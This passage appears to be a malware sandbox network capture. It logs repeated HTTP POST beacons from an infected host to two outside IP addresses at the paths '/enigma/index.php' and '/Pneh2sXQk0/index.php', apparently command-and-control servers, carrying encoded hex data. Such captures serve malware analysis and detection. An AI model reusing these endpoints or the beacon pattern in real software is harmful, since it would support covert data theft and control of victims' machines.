                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1443192.168.2.551298193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.182342052 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.430226088 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1444192.168.2.551299193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.199856997 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.448268890 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1445192.168.2.551300193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.684195042 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.937964916 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1446192.168.2.551301193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.700627089 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:36.952917099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1447192.168.2.551302193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.275361061 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.522259951 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1448192.168.2.551303193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.286827087 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.530177116 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1449192.168.2.551304193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.775175095 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.025163889 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1450192.168.2.551305193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.782433987 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.033735037 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1451192.168.2.551306193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.369090080 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.614622116 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1452192.168.2.551307193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.373883009 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.625691891 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1453192.168.2.551308193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.867949009 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.120127916 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1454192.168.2.551309193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.875552893 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.124686003 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1455192.168.2.551310193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.461416960 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.707493067 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1456192.168.2.551311193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.461534023 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.703552008 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1457192.168.2.551312193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.961059093 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:40.217286110 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1458192.168.2.551313193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.962671995 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:40.216438055 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1459192.168.2.551314193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:40.548809052 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:40.797430992 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1460192.168.2.551315193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
